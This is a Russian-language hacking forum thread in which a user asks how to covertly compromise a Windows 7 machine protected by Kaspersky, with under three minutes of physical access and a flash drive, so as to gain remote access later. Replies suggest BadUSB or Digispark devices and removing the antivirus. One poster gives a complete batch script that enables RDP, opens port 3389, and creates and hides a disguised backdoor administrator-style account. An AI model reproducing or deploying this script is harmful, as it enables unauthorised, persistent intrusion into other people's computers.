скомпрометировать windows 7, за 3 минуты

[Bush_Kape]

Всем доброго времени суток!
описание ситуации:
1)стоит машина под управлением windows 7
2)обновленный Касперский под паролем
3)пароль администратора стоит
4)разрешение на запуск exe есть
5)есть меньше 3 минут на манипуляции
6)есть флешка, которую можно применить
Сам вопрос: какие возможные действия, или что вы бы сделали, для получения бреши, для дальнейшего удаленного взлома, или есть варианты моментального обхода Касперского?
за любые идеи буду благодарен, за ранее спасибо!

 

[Bush_Kape]

а нагрузку с помощью бед юсб доставить можно

нельзя оставить флешку в компе, палево

 

[CHEATER]

эта связка не работает, так как каспер блочит rdp соединение

А смена порта ничего не даст? Можно попробовать антивирус антируткитом снести, только пробуйте это на виртуалке, сначала. Что он вообще блочит? Какие порты открыты, мб легитимные приложения подойдут.
P.S для того, чтобы вам снять пароль администратора, - придется грузиться с флешки, под этот шумок можно антивирус подправить.

 

[Bush_Kape]

А смена порта ничего не даст? Можно попробовать антивирус антируткитом снести, только пробуйте это на виртуалке, сначала. Что он вообще блочит? Какие порты открыты, мб легитимные приложения подойдут.
P.S для того, чтобы вам снять пароль администратора, - придется грузиться с флешки, под этот шумок можно антивирус подправить.

да можно, только у меня три минуты, а в этом случае не укладываешься по времени, я и так все манипуляции подвергаю тесту на своей машине.

 

[CHEATER]

да можно, только у меня три минуты, а в этом случае не укладываешься по времени, я и так все манипуляции подвергаю тесту на своей машине.

Так, давайте думать, что можно.
Вы должны смоделировать действия и в точности их повторить, только вы перед этим должны быть уверенны, что это приведет к успеху.
На своей машине я бы не проверял, чем вам virtualbox не по душе?
Как вы будите входить в машину? LiveCd? Я рекомендую это:

Ссылка скрыта от гостей

Порт менять тут:

Ссылка скрыта от гостей

 

[Bush_Kape]

Так, давайте думать, что можно.
Вы должны смоделировать действия и в точности их повторить, только вы перед этим должны быть уверенны, что это приведет к успеху.
На своей машине я бы не проверял, чем вам virtualbox не по душе?
Как вы будите входить в машину? LiveCd? Я рекомендую это:

Ссылка скрыта от гостей

Порт менять тут:

Ссылка скрыта от гостей

1)это не моя рабочая машина, а доп комп, так полностью моделируешь происходящие
2)машина разблокирована, и у меня есть время на действия: вставить флешку запустить с нее то что откроет доступ, достать флешку уйти
3) мне не известны какие порты на ней открыты, поэтому с rdp отпадает вариант

 

[NeskO]

нельзя оставить флешку в компе, палево

ля, так пришел поставил, отошли и в когда уходишь обратно забираешь

 

[fuzscore]

а почему не использовать digispark , @Vander как раз очень качественно описал действия

 

[NeskO]

а почему не использовать digispark , @Vander как раз очень качественно описал действия

ну у мя тоже на ардуинко только на другом(леонардо)

 

[~localhost]

Всё это просто реализовать обыкновенным батником, воспользовавшись стандартными программами Windows.

@REM Включаем дистанционное управление рабочим столом
@REM Ставим галочку на Мой компьютер=>Свойства=>Удаленные сеансы=>Разрешить удаленный доступ к этому компьютеру
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
@REM Эти 2 команды отвечают за разрешения двух учетных записей вход
reg add "HKLM\SYSTEM\CurrentControlSet\Contr ol\Terminal Server\Licensing Core" /v EnableConcurrentSessions /t REG_DWORD /d 00000001 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v EnableConcurrentSessions /t REG_DWORD /d 00000001 /f
@REM Эта строка отвечает за путь файла termsrv.dll
reg add "HKLM\SYSTEM\CurrentControlSet\services\TermService\Parameters" /v ServiceDll /t REG_EXPAND_SZ /d %SYSTEMROOT%\System32\termsrv.dll /f
@REM Заносим в Windows брат маузер запись что порт этот добрый
netsh firewall set portopening protocol=TCP port=3389
@REM делаем UserHelp участником группы Пользователи удаленного рабочего стола
net user UserHelp ТУТ_ПАРОЛЬ /add
net user UserHelp /comment:"Windows System User Help" /fullname:"Windows Help"
net localgroup "Пользователи удаленного рабочего стола" "UserHelp" /add
@REM Прячем нашу запись UserHelp
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v UserHelp /t REG_DWORD /d 00000000 /f

.

а есть под win10? )))